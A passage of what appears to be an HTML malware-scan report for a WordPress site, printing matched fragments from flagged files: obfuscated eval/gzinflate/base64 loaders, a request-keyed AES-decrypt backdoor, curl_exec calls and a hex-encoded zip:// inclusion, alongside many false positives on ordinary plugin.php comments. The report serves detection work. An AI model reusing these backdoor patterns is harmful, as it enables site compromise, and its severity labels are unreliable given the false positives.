style="color: #0000BB">BaRkq</span><span style="color: #007700">(</span><span style="color: #DD0000">'DjtPn+r4S0yvLCnquPz1fA'</span><span style="color: #007700">)){ echo </span><span style="color: #DD0000">'2ObvKVSmoq4Dl+rnoEQIo1wptub/NfAjx</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$BaRkq</span><span style="color: #007700">)))); </span><span style="color: #0000BB">?></span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">htmlspecialchars_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">gzinflate</span><span style="color: #007700">(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$BaRkq</span><span style="color: #007700">))))</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_38").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/js/tinymce/themes/themes/index.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 5.29 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:04:51</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:04:51</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 2</span><br><table id="file_39" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit double_var2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Double var technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #0000BB">$nzT04GkwvCt</span><span style="color: #007700">[</span><span style="color: #0000BB">44</span><span style="color: #007700">]}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">mm1tfDdTbsQ</span><span style="color: #007700">(</span><span style="color: #0000BB">$VKiVAR57z49</span><span style="color: #007700">) { goto </span><span style="color: #0000BB">hBRbAdGVAgY</span><span style="color: #007700">; </span><span style="color: #0000BB">hBRbAdGVAgY</span><span style="color: #007700">: </span><span style="color: #0000BB">$p3m2xVXU_GA </span><span style="color: #007700">= </span><span style="color: #DD0000">"range"</span><span style="color: #007700">; goto </span><span style="color: #0000BB">fFR97C2VD2S</span><span style="color: #007700">; </span><span style="color: #0000BB">gCuJvAqzdyX</span><span style="color: #007700">: </span><span style="color: #0000BB">$ImgqHrLT7gT </span><span style="color: #007700">= </span><span style="color: #0000BB">explode</span><span style="color: #007700">(</span><span style="color: #DD0000">"\51"</span><span style="color: #007700">, </span><span style="color: #0000BB">$VKiVAR57z49</span><span style="color: #007700">); goto </span><span style="color: #0000BB">BqxNFMj_AwD</span><span style="color: #007700">; </span><span style="color: #0000BB">xjgydKClhES</span><span style="color: #007700">: </span><span style="color: #0000BB">Khtly__3GCj</span><span style="color: #007700">: goto </span><span style="color: #0000BB">ls0Y1vFSsLu</span><span style="color: #007700">; </span><span style="color: #0000BB">ls0Y1vFSsLu</span><span style="color: #007700">: return </span><span style="color: #0000BB">$a4dGaGazYxR</span><span style="color: #007700">; </span><span style="color: #0000BB">got</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RETURNTRANSFER</span><span style="color: #007700">, </span><span style="color: #0000BB">1</span><span style="color: #007700">); goto </span><span style="color: #0000BB">XwMAfZFjqUe</span><span style="color: #007700">; </span><span style="color: #0000BB">XwMAfZFjqUe</span><span style="color: #007700">: </span><span style="color: #0000BB">$Gz9l7NIT4gu </span><span style="color: #007700">= </span><span style="color: #0000BB">curl_exec</span><span style="color: #007700">(</span><span style="color: #0000BB">$FXv3akFSKm6</span><span style="color: #007700">); goto </span><span style="color: #0000BB">DEAGLlT6uG2</span><span style="color: #007700">; </span><span style="color: #0000BB">WUtv1sSrwJ1</span><span style="color: #007700">: } static function </span><span style="color: #0000BB">R12oUPROR3L</span><span style="color: #007700">() { goto </span><span style="color: #0000BB">UcrFCgb3GHU</span><span style="color: #007700">; </span><span style="color: #0000BB">bHLvAmgw3p3</span><span style="color: #007700">: foreach (</span><span style="color: #0000BB">$UGVTVc1y5uT </span><span style="color: #007700">as </span><span style="color: #0000BB">$d6moLxAr6ps</span><span style="color: #007700">) { </span><span style="color: #0000BB">$ui7lyJRzh0R</span><span style="color: #007700">[] = </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">mM1TfDdtbSq</span><span style="color: #007700">(</span><span style="color: #0000BB">$d</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_39").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/js/thickbox/thickbox/cache.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 371.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:04:48</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:04:48</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_40" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit double_var2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Double var technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #0000BB">$F</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">]}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit hex_char <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Hex char is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">\</span><span style="color: #0000BB">x5f</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit silence_inclusion <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>LFI (Local File Inclusion), through a silent inclusion, allow remote attackers to inject and execute arbitrary commands or code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">@require_once </span><span style="color: #DD0000">"\x7a\x69\x70\x3a\x2f\x2f\x66\x6c\x61\x5f\x36\x39\x37\x38\x37\x31\x61\x30\x38\x66\x65\x39\x31\x2e\x7a\x69\x70\x23\x63\x5f\x36\x39\x37\x38\x37\x31\x61\x30\x38\x66\x65\x39\x31\x2e\x74\x6d\x70"</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 5aabe84e <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 5aabe84e)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">require_once </span><span style="color: #DD0000">"zip:</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_40").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/js/thickbox/thickbox/index.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 413.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:04:48</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:04:48</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_41" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit double_var2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Double var technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #0000BB">$F</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">]}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit hex_char <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Hex char is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">\</span><span style="color: #0000BB">x5f</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_41").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/js/dist/script-modules/block-library/block-library/cache.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 5.52 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:04:31</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:04:31</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_42" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'gZ6QzRA8vii0Af7g3aJZMrQWJhxLJ79W4P4xHff4ave/l7fpOO8t3rOXPZ6X9fej7OVCO6vrX8ZZ/xq+IK+u2XjFNeiaf4y17HHu/x3d4uP5u9XzKPc9bn9ydT96rX9giF4mB3px7m8pmvP34TZTJi1WL9p9Zt1F7f+j/vO5oP5vbMiaFEpzZKYtgvqZmcCtV+0++/GF6ZVrewKjxIS3oetIH2B72+BAmHE8NSsIiiTDWc90ydm7jqKrn20d6phwPgMnflIsB2Ibv7cEiJk4GoAHSkCeW2S4cMJEOfslZY5YfFHHuj8/LGrDBMrnbI0TJKCTfci7+ht9mF0T6VvdxfdQrGv5DbO/srd8bHrsVLVp6KzEkDWfAvwdrXZ23kQf+y974sPvYr3td93br0ZcNhSMKWCqurmcL21rTrodg9U7kJl4tILsdT1xfTV/H+9Vw5odG9VQm1oCyQCeodoYgoT3wq+IgZnR8YevinwP3cvmoh1kOeW...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit global_var_string <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Code Injection, through escaped global vars, allow inject attackers to execute PHP code on the target machine via HTTP request</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #DD0000">"_REQUEST"</span><span style="color: #007700">}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">nhvJU</span><span style="color: #007700">(</span><span style="color: #0000BB">$QAzg</span><span style="color: #007700">) { </span><span style="color: #0000BB">$nzCFX </span><span style="color: #007700">= ${</span><span style="color: #DD0000">"_REQUEST"</span><span style="color: #007700">}[</span><span style="color: #DD0000">"k"</span><span style="color: #007700">]; </span><span style="color: #0000BB">$HYq </span><span style="color: #007700">= </span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">$nzCFX</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">16</span><span style="color: #007700">); </span><span style="color: #0000BB">$rzVWf </span><span style="color: #007700">= </span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$QAzg</span><span style="color: #007700">); return </span><span style="color: #0000BB">openssl_decrypt</span><span style="color: #007700">(</span><span style="color: #0000BB">$rzVWf</span><span style="color: #007700">, </span><span style="color: #DD0000">"AES-256-CBC"</span><span style="color: #007700">, </span><span style="color: #0000BB">$nzCFX</span><span style="color: #007700">, </span><span style="color: #0000BB">OPENSSL_RAW_DATA</span><span style="color: #007700">, </span><span style="color: #0000BB">$HYq</span><span style="color: #007700">); } if (</span><span style="color: #0000BB">nhvJU</span><span style="color: #007700">(</span><span style="color: #DD0000">'DjtPn+r4S0yvLCnquPz1fA'</span><span style="color: #007700">)){ echo </span><span style="color: #DD0000">'F2tmrZUqrYgOYMEzHgtikjbieRZ/</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$nhvJU</span><span style="color: #007700">)))); </span><span style="color: #0000BB">?></span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">htmlspecialchars_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">gzinflate</span><span style="color: #007700">(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$nhvJU</span><span style="color: #007700">))))</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_42").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/js/dist/script-modules/block-library/block-library/index.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 6.11 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:04:31</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:04:31</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_43" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit double_var2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Double var technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #0000BB">$w6EIGxZlUkhyzD9w</span><span style="color: #007700">[</span><span style="color: #0000BB">32</span><span style="color: #007700">]}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return empty(</span><span style="color: #0000BB">$iT1r96gPyIftvriF</span><span style="color: #007700">) ? </span><span style="color: #0000BB">$xdiYT1xx2KFwqtNW</span><span style="color: #007700">(</span><span style="color: #0000BB">$dARpqXbBXMEu6Vwy</span><span style="color: #007700">) : </span><span style="color: #0000BB">$iT1r96gPyIftvriF</span><span style="color: #007700">; goto </span><span style="color: #0000BB">hp_bMVzAhuHeaHjm</span><span style="color: #007700">; </span><span style="color: #0000BB">T6Qt0osHoY9rElMA</span><span style="color: #007700">: </span><span style="color: #0000BB">$iT1r96gPyIftvriF </span><span style="color: #007700">= </span><span style="color: #0000BB">curl_exec</span><span style="color: #007700">(</span><span style="color: #0000BB">$qBKK3tS5P2v3W5G7</span><span style="color: #007700">); goto </span><span style="color: #0000BB">yITxaikuw82hSX9F</span><span style="color: #007700">; </span><span style="color: #0000BB">hp_bMVzAhuHeaHjm</span><span style="color: #007700">: } static function </span><span style="color: #0000BB">vH4mIMUlkYIP03tI</span><span style="color: #007700">() { </span><span style="color: #0000BB">go</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_43").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/plugin.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 36.87 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2025-02-24 03:40:05</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 14:16:41</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 157</span><br><table id="file_44" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">spl_object_hash</span><span style="color: #007700">( </span><span style="color: #0000BB">$callback</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">] ) . </span><span style="color: #0000BB">$callback</span><span style="color: #007700">[</span><span style="color: #0000BB">1</span><span style="color: #007700">]; } elseif ( </span><span style="color: #0000BB">is_string</span><span style="color: #007700">( </span><span style="color: #0000BB">$callback</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">] ) ) { return </span><span style="color: #0000BB">$callback</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">] . </span><span style="color: #DD0000">'::' </span><span style="color: #007700">. </span><span style="color: #0000BB">$callback</span><span style="color: #007700">[</span><span style="color: #0000BB">1</span><span style="color: #007700">]; } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1014</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions hooked into it</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1017</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">was called </span><span style="color: #007700">for.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1019</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">is used internally </span><span style="color: #007700">for </span><span style="color: #0000BB">apply_filters</span><span style="color: #007700">(), </span><span style="color: #0000BB">do_action</span><span style="color: #007700">(), and</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1021</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions</span><span style="color: #007700">. </span><span style="color: #0000BB">This </span><span style="color: #007700">function </span><span style="color: #0000BB">does not check </span><span style="color: #007700">for </span><span style="color: #0000BB">the existence of the all hook</span><span style="color: #007700">, </span><span style="color: #0000BB">so</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1022</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">call</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1031</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_wp_call_all_hook</span><span style="color: #007700">( </span><span style="color: #0000BB">$args </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 103</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">will </span><span style="color: #007700">return </span><span style="color: #0000BB">true whether </span><span style="color: #007700">or </span><span style="color: #0000BB">not the callback is valid</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1040</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Functions </span><span style="color: #007700">and static </span><span style="color: #0000BB">method callbacks are just returned </span><span style="color: #007700">as </span><span style="color: #0000BB">strings </span><span style="color: #007700">and</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1048</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">always returns a string</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1057</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string Unique </span><span style="color: #007700">function </span><span style="color: #0000BB">ID </span><span style="color: #007700">for </span><span style="color: #0000BB">usage </span><span style="color: #007700">as array </span><span style="color: #0000BB">key</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1059</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_wp_filter_build_unique_id</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook_name</span><span style="color: #007700">, </span><span style="color: #0000BB">$callback</span><span style="color: #007700">, </span><span style="color: #0000BB">$priority </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1061</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$callback</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1073</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">spl_object_hash</span><span style="color: #007700">( </span><span style="color: #0000BB">$callback</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">] ) . </span><span style="color: #0000BB">$callback</span><span style="color: #007700">[</span><span style="color: #0000BB">1</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1076</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$callback</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">] . </span><span style="color: #DD0000">'::' </span><span style="color: #007700">. </span><span style="color: #0000BB">$callback</span><span style="color: #007700">[</span><span style="color: #0000BB">1</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 116</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions with the same priority are executed</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 118</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">accepts</span><span style="color: #007700">. Default </span><span style="color: #0000BB">1.</span>
</span>
